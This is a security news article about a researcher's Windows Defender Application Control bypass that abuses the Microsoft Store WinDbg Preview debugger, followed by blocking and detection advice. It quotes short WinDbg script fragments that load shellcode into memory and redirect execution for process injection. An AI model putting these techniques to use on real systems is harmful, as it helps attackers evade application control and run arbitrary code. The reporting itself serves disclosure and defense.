%20(1).webp?w=1600&resize=1600,900&ssl=1)
A security researcher has documented a sophisticated technique for bypassing Microsoft’s Windows Defender Application Control (WDAC) using WinDbg Preview, exposing a significant security gap in environments where WDAC policies are implemented to prevent unauthorized code execution.
The bypass, discovered in early April 2025, leverages the fact that WinDbgX.exe (the Microsoft Store version of the Windows Debugger) is conspicuously absent from Microsoft’s recommended WDAC blocklist, despite its legacy counterpart windbg.exe being explicitly blocked.
“The oversight allows attackers to abuse a legitimate Microsoft-signed debugging tool to execute arbitrary code in heavily restricted environments,” says the researcher who demonstrated the technique in a locked-down environment where typical living-off-the-land binaries (LOLBINs) were blocked.
The bypass exploits WinDbg’s debugging capabilities to manipulate register states and execution flow through the SetThreadContext() API calls.
The attack involves converting shellcode into a WinDbg script (.wds) format using commands like:
text.foreach /pS 5 ( register { .dvalloc 0x6B } ) { r @$t0 = register }
;eb @$t0+00 53 ;eb @$t0+01 56 ;eb @$t0+02 57
This loads shellcode byte-by-byte into memory allocated via .dvalloc.
The researcher then demonstrated process injection using the classic technique of calling OpenProcess(), VirtualAllocEx(), WriteProcessMemory(), and CreateRemoteThread() through the manipulation of the RIP register:
textr rcx = 0x001F0FFF
r rdx = 0
r r8 = ${$arg1}
r rsp = rsp - 0x20
r rip = kernel32!OpenProcess
Microsoft offers bug bounty payouts for qualifying WDAC bypasses as they are considered security boundary violations.
This discovery comes amid increased focus on WDAC policies as a critical defense against malicious code execution and rollback attacks highlighted in recent Microsoft research.
The bypass is particularly concerning as WinDbg Preview can be installed from the Microsoft Store on workstations where WDAC is enforced but the Microsoft Store remains accessible.
Security experts recommend organizations take immediate steps to mitigate this risk.
“Organizations implementing WDAC should include WinDbgX.exe in their block policies and disable Microsoft Store access in high-security environments,” notes security researcher Hamza Zarki, who previously documented multiple applications capable of bypassing WDAC.
Microsoft’s recommended WDAC blocklist already includes numerous debugging tools such as cdb.exe, dbgeng.dll, and the legacy windbg.exe, but requires updating to address this new vector.
For detection, security teams should monitor for suspicious use of SetThreadContext() API calls from WinDbgX.exe processes, as these may indicate attempts to manipulate thread execution for malicious purposes.
This discovery highlights the ongoing cat-and-mouse game between security controls and bypass techniques, emphasizing the need for defense-in-depth strategies beyond application control.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The bypass leverages the fact that WinDbgX.exe is conspicuously absent from Microsoft's recommended WDAC blocklist.){kind=link}